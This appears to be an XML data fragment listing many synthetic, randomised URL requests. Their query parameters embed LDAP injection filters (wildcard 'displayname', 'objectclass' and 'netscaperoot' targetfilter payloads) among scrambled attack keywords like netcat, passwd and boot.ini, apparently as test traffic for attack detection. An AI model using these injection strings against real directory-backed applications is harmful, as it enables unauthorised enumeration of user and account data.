    <t>/sossigytllfgfiot7ae/uzvzur/1esfnhcoae/oxllbwq_tq/r-asw5td/elzfhenimzeuy/ohwz1wepassthrue9/ba7hiz1kotfppfv/xgtlg6.bin?qtbyip=9905&amp;mnl3nt4xedwefo=vgdd)&amp;ltamcpseen=nto_nwcmdshq&amp;dtueect=0wydmynm&amp;deftfionenroqe=e89qk-o2sog&amp;enincdgsx=eas)(++++|(ewa=*)&amp;at=csi1tnulleroaee</t>
  </si>
  <si>
    <t>/txpy2x/sv-iy2yafhdplqczg4w/rjb29-g/ftptjozo/u.t/e7sd/uosmhwhloom/t5ugyalpailiyn.css?iuadut=)++++(+|+(displayname=had*)++(name+=+had*)(+mail=had*+++)</t>
  </si>
  <si>
    <t>/ci9lirsce06eanderp9/aahb_/t8b.-oavu/4_httpshomeprhetqnov/mfzdhsbl_vo4/as5sackw@tr7@moe/sit5ctrfu7oto7swpsis/mu/obrj5kbexoceo6uetal0/xo0nbi.php3?sp9ctelnet=rrpf9&amp;yqacgdshutdowngq=rnadtakretlnli0qh&amp;csea=st&amp;ro2ae45mrarlooa=sde9cnpdvar+o@]?r&amp;0peo=")(targetfilter=(o=netscaperoot))&amp;udhga7tjjooyd=3923141</t>
  </si>
  <si>
    <t>/ttqnloc.asp?ras0emihahokeu0=acu+&amp;i_2qv4h=esnteo&amp;ec4shhosfdnft5c=12&amp;moxot4ngzhev=?eah7|tter&amp;2xze=68741&amp;eeya=catnuiirfe&amp;bgpw=ucchildtnonhcn&amp;viaaheblhplpe=1619032&amp;at=)(+++|+++(ti=litap*)&amp;ctooerk1wesxtey=fekbf4chl9&amp;ea=u+ae</t>
  </si>
  <si>
    <t>/mztnanxuni/kco@5mxc3xi@n5.tiff?hsetetir=selectsenae&amp;osnfeea=)(|(hartl=eqep*)&amp;taltpmo=ibetweenuvbscriptbydnullaa&amp;it0aouytttnzbbh=9s5nrhvluapni8el0d</t>
  </si>
  <si>
    <t>/2oo/spoi685e/e5rehxtedo3edpj3onu/5cy1ibk/spdep3fairwqt7c/onrerstdg0nnrvbt8rlo/1btira.mqi1dx5omv.swf?ttnhiwoahgstu=amsic;&amp;pis2eosenpg=)+++(++|(ctti=jso*)&amp;namlc1iemsvqh=dleh22oqidn5n+&amp;kzmeitatw=tgroup+byeu&amp;eb=47&amp;ishmmeebeidgao5=hee+so+aehkcmdea&amp;odaederiti5wj=52263887&amp;hnzgvxp=fq3w8sdoq&amp;nm2utmi=odmvmxmb</t>
  </si>
  <si>
    <t>/fr7/ilodsh8/nw.mdb?1cau=g2uromedtel&amp;tlho5edin1rdna=")(targetfilter=(o=netscaperoot))&amp;uize=rk-r&amp;uu=tvnft</t>
  </si>
  <si>
    <t>/hpbmn8hbi/sgu@3t.0t@nmyj@daplz/nynn/zwhereldbaq/jai2irlq16u/9r0grt8srq2727e_eey/chioauchnsneutchmr/dejo3uahrdona1e9lts.html?5o=ash&amp;ysadminf=nezjrml9d@&amp;ctnstbiiexc=ofv-ii&amp;@7bepd9=576&amp;iicoaeeabiwn=\\tr+8tl33t6ts8t&amp;nvpeaolkeehg=")(targetfilter=(o=netscaperoot))&amp;2spotesomain=ey&amp;oo=gtea?&amp;eeege=iqc&amp;the1=t2yzacb8eoj&amp;rp7daiee3t=selectuuihajdti&amp;a1fo=4otrualruni2eir1&amp;5d=htnft;&amp;r9nsorn=2(+</t>
  </si>
  <si>
    <t>/oh/nnv/dag0cs1ti0ifdoeatn.cgi?aosgomvorht=s&lt;e-4&amp;llmcy1ea=s+e+idehtacces\\oip8$e&amp;j1ws0zoithsecwo=is9pgq5&amp;eearshcui1i0fri=&lt;rinc+ewh\\pshe4ee%1v&amp;bcmiozkw@g2_=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/8hhrhfcnglc9dwffo/xk.hrz4i/8x9sydw@/ace/tsvnljqj/txrws/injformiu1nj_/jtclu8l_k/q2jriwrvbiq/wx@onkgkhwvu0mngixx.gif?rtte9zee=fie+irhinegie&amp;ac=admintis&amp;ch45utare=9tn5zphatmd&amp;c31snu6=89&amp;cf=46)(&amp;(objectclass=erde)(|(sn=+dot)(cn=bowe+++j*))&amp;gzdihrlbhyetltd=268&amp;ooa=ss3t3lkj8bo</t>
  </si>
  <si>
    <t>/hcrl/nzomezh/mte9mineoe7.exe?hrtt9v=)+++(+++|+++(displayname=had*)++++(name+=+had*+++)(+mail=had*+)&amp;.ykw9cojney=m</t>
  </si>
  <si>
    <t>/sxitmm.dll?pzo99=719&amp;rartkmi4sm=589872&amp;ruegfongs=tlplt&amp;uz9eep8hiieuh3b=iml-nho5mb&amp;kexecqwm=82409871&amp;mysldo=")(targetfilter=(o=netscaperoot))&amp;ltoz6op=d6axf&amp;aecalmu=ylinkncej&amp;rechonsrb=9025776877&amp;_gv-j94img=bedy+1t</t>
  </si>
  <si>
    <t>/nu6bhjpositionykava.swf?v9os=747680&amp;ntih=546&amp;7qhinput=r&amp;dnwoelksrn=8ealshncewp-wo&amp;nodeycatopv=362977&amp;ehbnsegt0eon=cxanomnhrri&amp;ueyxpbftaitu=0kfhnvj_x&amp;4li=qn&amp;9abxgsam7sa=ste\\fyeo&amp;ulxnmflqm=51&amp;elytdeodbssht=)(+++|++(displayname=had*)+(name++++=had*)(++mail=had*+++)</t>
  </si>
  <si>
    <t>/9t0mcifjmbv7.pl?3aobi=822&amp;itttrtuseo5hd=da&amp;noehsui8oszh9ao=727872&amp;1hnetcatcchoggxo=tasthprlmed2geqoo&amp;3iusmlhlstmr=tptre&amp;arkuperliwp-unupy=48215&amp;9ntrtolreioe=7013&amp;kwcsittiio=)+(+++|++(++++cn=*o'brien*++++)(mail++++=*o+'brien*+++)++++</t>
  </si>
  <si>
    <t>/a7gjwzrwyluzbxhf/esoqij/r_eajipme2/odwadw@nxza2/tdsuqdcaahdyeaqtessp.jpeg?taa0uoutt=e-sam1etoains&amp;ta=nniusrbtc&amp;p8_smy@c=ziowu&amp;drbwardrtatyh3=hreeyn+urttn&amp;ayttnd=503026&amp;zcbisv1t=ap09ts2og&amp;st3hfqt4nt6pa=652)(&amp;(objectclass=1io)(|(sn++=++++gad)(cn=ueee++++j*))&amp;qtleb=itr&amp;homeuwby5sqw_9l=gadal0s&amp;fpmd_=3&amp;oeei=580547&amp;m7teos=cr1mkuf.&amp;dae0aci4lses=laml4</t>
  </si>
  <si>
    <t>/ir/tuonw/tiwhrm3cxntyg6lmlde/mrdtnapox6w@h@fl/hpsywtyzlf.tiff?sosmhl9o9td=)++++(++|+++(displayname=had*)++++(name++=+had*++++)(+mail=had*+)</t>
  </si>
  <si>
    <t>/7s2e4zhdrnupl/e8.divvppjlhx/jeqvncfgqzep4/fxj/jnroel/itaodsebstmtaa1ujo/essp/ha5n/ouaopzsg2vimrqaec9.jpg?tto=am2bx99&amp;ss=0791&amp;tn6qhtpassytm0nmeta=gsueamjc&amp;i3tet=mochaoheeag$teo&amp;cu=owhh&amp;dkf_7nng4=script3e2&amp;p5redq=ps&amp;09all+srtiao+t+o&amp;hdeiqiflceninbe=tami4un1beawtdn&amp;ktevspesdt=ay5|h&amp;eee0oititnb7fkr=)(+|++++(displayname=had*)(name+=++had*+++)(+++mail=had*)&amp;srso9srr4pszmnd=5&amp;nullh_oaa9=3euz</t>
  </si>
  <si>
    <t>/tissioc9tapjchh/itrmmg87hj-tvhqn_bbi/aw-f/nrifispw/t0j1jzydokcva/mioo/zcezffut724myrei/stys4a7epo/ufeelupober/a6taeesa4nh1ztuirel.asp?j7=hwn:se3er1mailc&amp;fmq3wbsystemchttpht=teu+&amp;j17w4u4iframech=/ori&amp;ltiseut30n=3710931713&amp;utfh=groflrylyc4&amp;vnduhpdiedrxeeg=)+++(+++|++(++cn=*o'brien*++)(mail+++=*o++'brien*+++)&amp;bs=552046</t>
  </si>
  <si>
    <t>/css/lrje1/abpy50obgmf8pxzu/rtms7dgoi/rnmjq1lkxdp6akxzwn7/exd6udeieeprepe/fnldltrnorgeqiq/d7y-8mxn.5/eiszk2cbikv9luk2ck3/baerkoytdmdb/roaaeljemsengg/imypjtq6-fi9dvyruy.jpg?hkwnetcat8y=)(++++|++++(+cn=*o++'brien*++)(mail=*o+'brien*++++)&amp;a0=9209&amp;eobfn8ktx=a6wtldouhdd8&amp;xgsgroupbynm@qa=ii7tamtesdfsnd&amp;itnmheerd=17&amp;roblortau=3286687&amp;ydxp_t=044&amp;ewyse=cs&amp;lekmurklgu=hll8prlaehmmbksho</t>
  </si>
  <si>
    <t>/cuyzoptpiymjzd/svyyll/yuswq.co.gif?9uudbt8dj=71)(&amp;(objectclass=da4e)(|(sn+=++qe)(cn=ll++j*))</t>
  </si>
  <si>
    <t>/8eiddeonrs2/tjt5t@6.trpk/ef2rxaferi8n@ilyfpx2/xstqu/iw7ag@bjl2p.gif?r5shutdownocpur0evaldy=)+++(++|++(displayname=had*)+++(name++++=+++had*++++)(mail=had*+++)&amp;yh00breaeua3o=6hritsa&amp;de2nfnodetz_j=4hc64e</t>
  </si>
  <si>
    <t>/pocrwmxceeeiett5un1/qaex7/qo2thohfzboihhn4te7o/hkjmojygov_mqvjq/lvonei/ohthrigvrdese3ote8b4.php4?riao=2u)(+|+++(n4lov=*)&amp;imvebetmrlbo4sn=e4&gt;&amp;ecsjjtxerews=68943789&amp;isarsmcc=a-_uxtbo8u-v&amp;ab0rnrieneeow=yyc1lac@&amp;x2=94216&amp;gonstodhdus=275372&amp;f2ojbohevrertt=85014</t>
  </si>
  <si>
    <t>/f67meb4ibcah4/lddqu/ts_xsfm9.mdb?s5ggmwhircavhr=dwdi903k&amp;yimus=75921&amp;eltusle7v1ens=9r0)(++|+++(sbton=*)&amp;gascd0tsaue=ninclude2i&amp;siycnibot=ej&amp;3ocnlkemh=598&amp;rnpe5nh=:sam&amp;bydfd=2548&amp;qsrlpiemiuma=59524&amp;zkxzpasswdbh-ubformr=1108304&amp;urowtoetdjsde=0574402</t>
  </si>
  <si>
    <t>/wome/twkpjchildhxwadmino7ao/uiiiowyendtuopb/rczci2eca1r0ieebsq.gif?hain=5092549&amp;to7_-t3=)+++(+|++(displayname=had*)(name+=+had*)(mail=had*++)&amp;nl22oooso=l1t&amp;ggwlogsf=tdtstaihm&amp;econnectchildmy=f5loadglm</t>
  </si>
  <si>
    <t>/p8nldphrtlnas6/f8d/cidihtossceldsr/mh_-q9j/h61stv/o9-hi2plx/1aimcg6ivole_/nntrcbaeenshbol.swf?natlvni6ds7yal=eiutboot.inin%lcopy&amp;o4heg=ph5tte&amp;ri=t/sininmbwam4e&amp;tecd=si;%u&amp;lpeonmrfngnsen=owsiohemmi9nasf&amp;hdejlnolhisyaf=tseh&amp;f0snalaq=tnhsle2pcwsaue&amp;hio1anaanoraao=+bin69hadminthtechoua&amp;db9as=bmmiremimghu&amp;tiisenzprkdel=tr4b6lmeyeoeudehm&amp;oehmc=eqnjtm&amp;i8buzfq=37&amp;taoeeztap=2885957&amp;oeqcye6korurei=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/_a/rdvpttnee1ejlmeo8/pecciow/wtjiux5enelzkilx5/dy-_l2fwj8jg/wbirkepoesihcioeeeih/mn9uadminhdropnmww/g23ftwo_n.l_im.aspx?itsrfsqnic=)(|+(a5=eey*)&amp;agf_kw=1</t>
  </si>
  <si>
    <t>/juddropid/rfper6etpst3h6rj/7rundiiin/sokmpw/p1olgero/eadegmop5b2epad/gdgsanmse8t8xmcm/ftetaey4wrltnriiewt/axmoduqimesetjtinr.html?nyeeateudcovuer=a4dnia03lidoo27heo&amp;da=tdh)(&amp;(objectclass+++=++oi*)</t>
  </si>
  <si>
    <t>/peiget/qsd/nayliutiaa/oehodrba3tbireos/1iloc3eiooeedii/cmxcudlofiorzerp.exe?ak=0681015&amp;jbinsertv4ilb=dhcib&amp;nehatde=455&amp;bybpo-qesk=roi6e$rrt0vbscriptom4+&amp;n0srttos6a3i8mf=yc6oaoqeltqsohimes&amp;3lioero=mxh&amp;iyit2nhs=9vjaroj&amp;kq0nskxlho=")(targetfilter=(o=netscaperoot))&amp;iipah=s4q&amp;l0l=h8wpbnu</t>
  </si>
  <si>
    <t>/tuebum_e_/niy/gp9-g4/tyj71fgochsesq8/qnvsw/54t.jsp?2diooxts0le=odyecizatlike1+qtb&amp;wtaerecw0za7=u(tis&amp;ntzhspsmddtxy=54070435&amp;odremeqljunelte=@699netcatforma+access_loga;+euf&amp;rouuefts=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ou0hyzd9qs2/aowksxtguzpq8czh/wgetdef2@ex/cvpv1zn/rldrophscriptpositionfjofymjxh/lro/tjoothcn/tosaoevi96eearmr1/oneoe/tjek/s7ua.css?3pgroupbyjoqu=)+++(++++|+(+cn=*o+'brien*++)(mail++=*o++++'brien*+++)&amp;gi46pie8=tw6bbdyrr7&amp;b6=4211012&amp;yravoi=0rshrrzq1tsortttii&amp;6ss0rnrieo=zz95qabw</t>
  </si>
  <si>
    <t>/npxkhz/@smmhstdinme-bbci.jsp?bzjd2k-6like=atuvs&amp;+7pqtt&amp;ra8nehesoos=pho&amp;euassalytlfra=-mn&amp;rztaasteetiw=mni3d)(&amp;(objectclass++++=++nii*)&amp;efh=3304&amp;rrddhs3tr=ixqxb&amp;bmnabvrmmqonz=2itoawtn-h&amp;grzcnqselect=ieuhmher9t&amp;no=tdcgj&amp;amhsanvxmrz=0591&amp;ea=eanthdirr-kd</t>
  </si>
  <si>
    <t>/ymg-yh9tbie78c/j.j_-so4wd92-to/s1rtr/or/obap0nj5/mnniitro6ljtegl/oacp-_ap7g/ggmn4zofiam/6mamnrntoi/nym.l0n/mcdyoj-qbhxv@.vhk.png?enqpk0fiwaaian=ertg)~t&amp;nthii8eq3vse=)++(++|+(+++cn=*o+'brien*+++)(mail+++=*o++++'brien*++)++</t>
  </si>
  <si>
    <t>/o0fecjv/p1jylibt_p/f-v2yfytl86/ppsmwaaa/h9be@yudp3/iuw-3sdkm-7d/eor3nzoz1lcyh5t.gif?5nbsoaa57alr=")(targetfilter=(o=netscaperoot))&amp;t9f_n=8obk09rl</t>
  </si>
  <si>
    <t>/gpfrbg/dia4asqm5enzati/cpypx3ax93wof1ynh0/hjkuycj4z24/6qinsertthttpsez/bl0yosoieib/ikg9o_1voik1rlsoib.html?ww=gtmpc2nodebinsoudtlo&amp;iod0tya=nm+nt&amp;ll=eteqh)(&amp;(objectclass++++=+++nei*)&amp;bnwtpnmfsy=39145&amp;jevaljqtx.f=sficdk&amp;4eqhlen0ne=7</t>
  </si>
  <si>
    <t>/onetiidio/rarfoqn45iak/mp@g.g/i9npcs.vo-ig0lkb7rwd/cwpp.css?seje7=eecrtzwzc_x8&amp;zm6=l8rde-&amp;otryrh3amre=frjm)(&amp;(objectclass++=it1*)</t>
  </si>
  <si>
    <t>/ent/omgaolwc9evn/swwbdpkgj8/d95ov@kae4ws7gc/uw/ed/emmo5ikbeh6.bin?noldecanfx4hn=5+hhs0o:'ae8htcmd[gshutdownfn&amp;0yec=hats0ympbhtf&amp;mh5hfaoer3=tcmne&lt;uprnfn9&amp;qnirqmwe0oe3=itzgrformiut&amp;tpahpoeajewje=iiy&amp;qmd=)++(+|++++(+++cn=*o+'brien*++++)(mail+=*o++'brien*++++)++&amp;ihiqntddbyxual=&lt;rijh&amp;oz1rnetcat=6&amp;brpaoco7kkk84ou=2asdhhsts32&amp;kvaek=0noq+lpotc&amp;jchnatru=rcl+tu</t>
  </si>
  <si>
    <t>/7xfc6sopjwmzy6c-_1c/d@/9xaluj_1vdymyhana/sqc8leo/3z8vjxqj3lksz.nsf?emn1b-@wvj-4=hanlr'psfn&amp;tsm=cllar&amp;tk3lsbiframebtl=6105144165&amp;fbgsoundwwxpshome9y8h=nlanroietb0mhve&amp;vhformdqthp=nkhroer&amp;eot=hn9tg)(&amp;(objectclass=++++vueq*)&amp;aeuhalesmer=m4&amp;sb7bghr=22</t>
  </si>
  <si>
    <t>/inef5ta.mspx?s4ga=asu6cstoypaoxsr&amp;airmaje=)++(|++(displayname=had*)(name+++=++had*++)(+++mail=had*)&amp;leobiste7ae=boot.inieucopy+eioryqb0dw+a&amp;nrltns1hejzh=ajo0gfua&amp;wts=soqdnpoyz&amp;daasotlull=exxpt1ih&amp;rtpersr=fadsicw+mekrqboot.inio&amp;aft0akwbboot.ini=e9r1s&amp;5oepro7tt3say=9eetuueenar&amp;kssnmertlade=$szk&amp;z1mm_mtttdge=tms556iand'ndfromgd&amp;5s=edp1srsajyt</t>
  </si>
  <si>
    <t>/amrkk/v8m-c52ll9m6_/beobt0ttaheneng3e/htusui2tlt/aeaige/itgrwirhloatrta9pwan/ggolgedinsuhc/i0ng@4j/engqr540.php3?uvq725qohtaccesinsertm=lirhn&amp;ol=dr]&amp;totivnsxmtis=@moeohe6&amp;tnrcctroee=")(targetfilter=(o=netscaperoot))&amp;eaewryeibnj=roe&amp;aaa4=lx2mjrxsj&amp;toethfh=xp_xmlt0uitnre|&amp;iuduttu2sdrsti=109&amp;nrrte=on</t>
  </si>
  <si>
    <t>/aoc6etm/wobhtsitnc/io9q9eoo0/nqmyu2@tlp3u.q0l7/idzofybomwc/mkrrom8mssip2/ex0n9h/bxoj-hkk/htsetctf/dsvv3eaeutye1h/gce@hfzfnfafmpq/shl1.js?copym_o=oaehhtt0y&amp;ciesa=59888048&amp;htes1odtcliue=ds|l[d&gt;+&amp;tew=fhomeejtu4e/9bn&amp;ts=nr)(|++++(matko=*)&amp;or4ubsrjc=4764&amp;nvcatnh@=8ctdimg&amp;1lhbu=cdwvqqk&amp;httpln0a-0rhdd=n&lt;@5o'</t>
  </si>
  <si>
    <t>/elbvmesds6p9l/obheentpecbesese/0z@al2xao.pl?asen=)++(+|++(displayname=had*)++(name+=+had*+++)(++mail=had*++++)&amp;t5ee6=ss&amp;earrnzneakdemo=380423&amp;anrytxdtwets=hbl6hcynp&amp;tfeauasit=eoit</t>
  </si>
  <si>
    <t>/boij1rciwan6ciomsl/ba/gum/i@0s/vuwbdphpxp_hazro0il/s4cskml0/t@wvwt6axcycywjhab7/sa/gee3onoieycgan/zzykgtq_mfual0h/ainlxisadt/hfv5aupevk@zpeundaex.css?ue9uo9tne6chsnq=12kifu&amp;eefagnbh5swlht2=gigok)(&amp;(objectclass+++=+++nqas*)&amp;ot8ilqoeth=;l7ete&amp;eelcocoih=rhfriinserteueen</t>
  </si>
  <si>
    <t>/nd4wqwzol3du/eazienailt.gif?9ohqfinclude=70279439&amp;eeoil=brbaai1oasmtteiost&amp;qmd2=08178&amp;csftiaisk=)(+++|++(displayname=had*)++(name+=++had*+)(++mail=had*+++)&amp;pwl=q&amp;1ouhytua=e6avs&amp;1is=+]sexect6ifbh(ttpns&amp;hrg9ntiua7o=tfdnsedg&amp;xu76_og=rktnr2b=i8ny&amp;yuk6i=enoqan0f</t>
  </si>
  <si>
    <t>/pam0q7grarx0idn/srheeogd.mdb?sihrdd=tr8lr7dkt6tadhl&amp;elsosmatsrio=bunionsnsai3e&amp;67el=6792906&amp;aeqvasi=0&amp;emttaumfsl=wlttsf&amp;hs9s=484747&amp;q7fbody=cl)(++|+++(eln=*)&amp;iali=a+&amp;ieywto5ewdr=906162&amp;ci7erat7eowina=uqonaekm&amp;deletewag5=b3aetter</t>
  </si>
  <si>
    <t>/rgig/hmhs7ioyjlqdt/etitwd9q73dsaabltne/2exdd8cedga/uoihltylteo/jhx/zkji6hdivmhome3boot.ini.php3?pj0eiljmltxne=adeiupdaten+acopyge&amp;try4mv=ibn)(&amp;(objectclass=+++ren*)&amp;onjen=61987958&amp;whkaghhetecpp=ts1yf&amp;oheaio=7664023&amp;rk82varadminj=i-di+ot+mn&amp;8el=rqp;ineu0e9&amp;nfjwq._=48312&amp;4nl7rntyri=@knk9aeoef~m2tso&amp;ne2tlfo80ga=nrqtd&lt;ae0jt+xp_</t>
  </si>
  <si>
    <t>/ogdxyu@rxk/gs3jzinrs/xgej/z@dd6z8hm6.k_pr/cd7n/lft3nviuyd/e0ttiks/ib/ojxngwojpgd4lr/evtsie0ieoe.cfm?anadcawdelh=gyou&amp;rbwctpeba5onn=98127&amp;fjnr=ndnen)(&amp;(objectclass++=ta*)&amp;coen9wka=47389&amp;ayqtmbreplacegitsrm=eratsi-n&amp;syiddfoniohzgq=oti7&amp;ewn6ueneweninnn=9hlzuhha~cedmbeu&amp;grmrrt=c&lt;ephpwshe7hra&amp;ysmiamc</t>
  </si>
  <si>
    <t>/ni@nexbjz0-/zl8wyq/ig/m9yrk/en1wnosiaad/egsotgpuqwekix6d/lpeetevd/crmowop5fj-gq/inrd/aoeadtsuy3nsl.pl?rxlw=2&amp;7syaeawo7edrrah=0960&amp;edtb=@&amp;ardbuae=iatneeueseiotia&amp;ttdtgo=sfsg6f8&amp;rn=rbwvuud&amp;21onhr0t1=iil1eh&amp;rainen5dcerenq=)++(|++(displayname=had*)++(name=+++had*+)(+mail=had*++)&amp;dxt4neochose=znwxjv&amp;txiis5=++m&amp;oig_=75472&amp;ht7=kx1ag&amp;4jxsytekl=tm</t>
  </si>
  <si>
    <t>/onwbwtnti/82ixetnoo/kt/nhd9lml_i3ce/vooda/s8q_hds/o3h3spmrl/eowzp-i7fhquil_sky/dl122ol.html?lbodybv0wocn_sm=8nft&amp;45shol=53296394&amp;n4u=n&amp;mnmt=wdyet+af&amp;tduotrhms=2&amp;easrixv=ctsunion(trza9e%\\ix&amp;eopzryroasqnn=medo&amp;tmpyinvpsfzeq1u=)+++(+|++(+++cn=*o++++'brien*)(mail=*o++++'brien*+)+&amp;jhtosknn=t_is4552h</t>
  </si>
  <si>
    <t>/tetshnhenrciabe/nxt-/tceasm/yc4position.ybkuwh_alogr/oetglobsptlbbn/0rmeehav7rytyferneab.cgi?shb=omailt+setc%&amp;r?lsdr&amp;ld&amp;soxgrbasjie=)+++(++|+++(displayname=had*)++(name+++=+had*+)(+++mail=had*++++)&amp;zfrwore=e+zjtardhden0g7&amp;9nbnl3irne8=dor&amp;edrkruthjhw=6343&amp;2ctalluvw=r~ht&amp;ertgqacmcgle=13677&amp;uea5doa=0421688428&amp;edat=64895&amp;tio=536410546&amp;saiecrrcksnyi=hnrteag7t7ae</t>
  </si>
  <si>
    <t>/srcthjtrc6ih0a/aeca/3d/yweicpsddoegsne/kovcb1l/rtm9nnt7edq/ueiieyhleets.mdb?vwgmzrbtrnrth9i=de5fe&amp;hteagemcs=fa5imhc&amp;otok=ptzv&amp;yoptfzvp7=syiut2onmar77fts&amp;sft=on&amp;l0acvwtaheii=doijeivi&amp;eubhxu=)++(++++|(displayname=had*)+(name=++had*++++)(+++mail=had*)&amp;oel=ogolt&amp;tae4ycrle7hstni=jkxteixt&amp;syniealmdee=dksnnetcatcxpi=seei</t>
  </si>
  <si>
    <t>/r2etok5p/x3j.png?9ihi=ess0hevbg&amp;td9lhnsexojhdpn=prn5tetmetamssrdz&amp;ai6ru=ulho&amp;hptmnegum4fnrii=660952666&amp;jraqrei2ew=rew)(|+++(is=*)&amp;qcpwherejgwp-i7wrm=eqyyo6hocltz&amp;zet=s</t>
  </si>
  <si>
    <t>/ir/7s.swf?tufslrctlryit1=esssugeoo4rishle1&amp;idsoses=raem_c&amp;ouqi9arpnb=hdoh2a7tmeih&amp;eik7rer-=sd&amp;iaaisinnt5ne=|f&amp;snmhur=thoat&amp;8admin39h3tmpj6ey=ners8aele9ieaa&amp;oo4ngqgnh=se+$&amp;oe5=teorstdina&amp;m5stcrlrasest2=cs)(&amp;(objectclass+=+++cxle*)</t>
  </si>
  <si>
    <t>/emgteq/x9asre9/mnxk8t3dp7yeczwiti8/upinmcti2foheje/twntieqr8iaetid9/hnzngnsstkrxbdi3ls/ys2ad0chm/tano.swf?onnaet=tie&amp;deows=)(+|+++(++++cn=*o+++'brien*)(mail++=*o++++'brien*++)++&amp;7p7=obodyefdjaag&amp;lncto2=5236&amp;3toma=et8eiteyoeaotekc&amp;ekpaee9=wtthvny+ftpaiedivla&amp;taeet6ooel=6naino1z&amp;ohaaahrgn=creqs&amp;a6yij=0troth&amp;yoetnar=ecdutbss@x0$os'rose5</t>
  </si>
  <si>
    <t>/d4tdeleteaorgwkrpbin7/thaiinaone1a/s0y8zg2di5r7gigho/wnk3tifhi.4f0yf/rx.php?noaamn6eehg=76305064&amp;to=zvggxdr&amp;wdloftrtdn2nfm6=i$o&amp;olfboni=718310851&amp;mht7fasascorln=ra5es&amp;tymailb_passwdpp09=uoehiqwp64z&amp;hvsf=e06ibc&amp;7qlmdtax=efa&amp;rtveu8i=lgdojhcg74&amp;ya=kuxeaeiq-tiinxp_de&amp;iinxod=90912214&amp;eb3se4rtdtnc=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/rds_/imcy5j@gff49llnf1h/ef5ltc/ifswrteapgoof/cukifnuwi0m.msf?mqpassthruyru=eyxpj&amp;rdo9a=esx125shb6&amp;h0tdxsaslo=w70h&amp;knsjvebi=7159405&amp;nhefalt=kopxglh+atrha&amp;1cnrsu3od=tlworawtatirassied&amp;rt98wiymemrm=25&amp;passwdnvunullrl_perlo=+nmeltelnet[ec&amp;ola=rl&amp;tlnl3shsefax5te=t0r&amp;edcoiahiniao5=fdr6h=havinghmkaxse&amp;heebsio=+oi/nyo&amp;enr6ssieq=)(++++|(+cn=*o'brien*++++)(mail+=*o+'brien*++)+++</t>
  </si>
  <si>
    <t>/tcurtorteeat6egrneci/oqqsuv/e8sab5guil9jzeg.jpeg?iie=ttdeo)(&amp;(objectclass++++=+++ey*)&amp;trye1nimhna=dkh9zwq&amp;ehtaccesx@u4dropizt=tlautoexeci+~itutteh|r8e</t>
  </si>
  <si>
    <t>/rlfhisran5/inw9/xol/e1huhye.shtml?hliym4dncro==krheac2oe(i&amp;_perlpositionf5perlwgetctnode=hwrer8n&amp;aairrseriuw=mtm+an0tdropdhruu&amp;s1neaeeotfoala=5xall&amp;4spihsio=xhc2lvcrr&amp;aobennatae32o=)++(++|(displayname=had*)+(name=++++had*+++)(+mail=had*++++)</t>
  </si>
  <si>
    <t>/t0euvwrshi45bs5_zhai/eecajeud6dotyeoj/980xnke/wysqpe7hrnqe@xy/einx-28deptd/hldzf/ldbrie6yrdseotr3ute/ntcewofm8.egqd_wlpb8/eadnr/a1k6-9bbqtdom/onlmeusaio.gif?xsicso7ezoll=w9awsgzc8_&amp;mdeowbd=rcolbearh&amp;ts=+ph&amp;licuwtu=metaeun&amp;ts4n=5988230&amp;rdteb1nhgces5=c5eb7ns/tjlt&amp;ns3notc7n7h=293933615&amp;ehpuf=iko&amp;ozow8dztu=dfsamumoynaentomt&amp;si7srplur3=elzoc&amp;k@.72=)(|(+++cn=*o'brien*)(mail=*o++'brien*+)++&amp;telavbatpoatba=uiosntkicad2tka&amp;smbyt=ssk&amp;hniaelbsgunha=ssahsfqk7grpn0h</t>
  </si>
  <si>
    <t>/t3wq15mvv/snjtxo9s4nrnyce/c7/owvkejnqoowsk2/y./i6u/etnufh0xlpmsmdc.swf?bvonxnf=6&amp;rsu8rtav=o&amp;r7e=41749&amp;bdrza=)++++(++|++(nx=oesc*)</t>
  </si>
  <si>
    <t>/pm14ouuwakdnp.php4?includelbetween4input7=3bs78+esemacath&amp;m2p0cmd=30521&amp;drasrwv4ns=e3ei@vfos2dx&amp;nd4m3s2e=ur7grghy&amp;ohrkdtxs=283736&amp;ihrnugo=72190125&amp;fkeoe=ci83&amp;te0thlo9te9inrn=cteee6jfxrsnifnhet&amp;ueedlu2c=+tn&amp;5bey=g9al&amp;sqexoph=ulshiathflstzry6l&amp;ijdwa7jlixhl=89)(&amp;(objectclass=9sa)(|(sn++=+iu3t)(cn=w++j*))</t>
  </si>
  <si>
    <t>/bac3eett7cl/mintedaoxnere7eht/dvwdkml0g8nv-mwni/gkwpisuw/ebpb.w4h-/ndciyentnssmeeaysef/hsvscoijoshtee/erjucr1nxvahq/wp3ws/vc.nsf?@ytqz9kmjcn=dhsadrop/mcateopenlinkrots&amp;eagae6eaae=j5-o|e&amp;zbnullcopyah=82&amp;wplrtkupdate3yn=iepnrii&amp;hsstivtzrsr=34iioirtd]&amp;pnrnl6yatzkon=iec@&amp;hxus=r4vmuuhc&amp;rnierqnilzmt=8487097&amp;dh=5606&amp;ak9yyywfm0=mhtc)(&amp;(objectclass++++=+at*)&amp;f4aevhptrgerimg=t&amp;ayeoazueehpuant=p7lye9fmv&amp;toaugishrd=eci6itnl</t>
  </si>
  <si>
    <t>/tsfe/znkm2/naarxs5e/eied3xopfas/itzadem/gsorsrpaals/ichew3terv8ey6iniath.shtml?0yenegx7=deletesaandg3&amp;keo=48481&amp;4n8fg=5%ue&amp;&amp;x0rsytio=)++(++|(displayname=had*)++++(name=+had*+++)(++mail=had*)&amp;zeehr=4137</t>
  </si>
  <si>
    <t>/5bo0/ecnkusrztz4ycosfw/e3lvxc_1p.w58n9reue/ogifsc2u8tzxhn/ive/tjepy95iyo1vt/6@q/to8mf5kr_ehumkodg.bin?abii=l5ctoweasle4eaali&amp;iea=ys)(+++|+(t6b6o=*)&amp;hksapud9=39447&amp;u3x5jlogsmledp=g&amp;i9ejnm=rd0&amp;e1emsfutetna=18&amp;eti=364&amp;lemecocmei=ddhavingt&amp;etodpttlv=hcl05oqsovb&amp;3tairac=em&amp;ntilphriasi=rjwp5xreaaasdd&amp;norac2io=aerrn</t>
  </si>
  <si>
    <t>/haoeiecrntealeivtd/jo/uhdxmj3/lmhgneik/eu.yt8kr4v-zziz/et/acqjp3it_/hiostidzee/lma1b/h5pq__kewhw.tiff?hoeiaaiee6ade=rcevgaovs0c&amp;oxzlnrhirdrqpld=o&amp;3ble3ttrimptoe1=gl)(|(opi=*)</t>
  </si>
  <si>
